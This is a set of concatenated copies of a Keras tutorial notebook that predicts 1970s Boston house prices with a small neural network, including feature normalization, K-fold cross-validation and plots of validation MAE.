Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history_dict = history.history
history_dict.keys()
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
#Calculation of minimum average MAE in history
print('The minimum average MAE is: %d \nIt is located at the index: %d' % (min(average_mae_history),average_mae_history.index(min(average_mae_history))))
###Output
The minimum average MAE is: 2
It is located at the index: 54
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
We can also compute the average using *numpy.mean* function over axis=0:
###Code
average_mae_history = np.mean(all_mae_histories, axis=0)
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
